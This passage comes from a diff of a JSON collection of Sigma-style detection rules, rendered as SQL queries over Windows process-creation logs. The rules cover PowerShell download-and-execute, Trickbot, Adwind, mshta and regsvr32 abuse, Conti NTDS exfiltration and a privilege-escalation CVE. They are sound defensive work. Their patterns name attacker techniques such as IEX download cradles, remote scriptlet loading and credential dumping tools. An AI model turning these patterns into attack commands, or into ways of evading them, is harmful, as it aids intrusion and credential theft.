'\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": 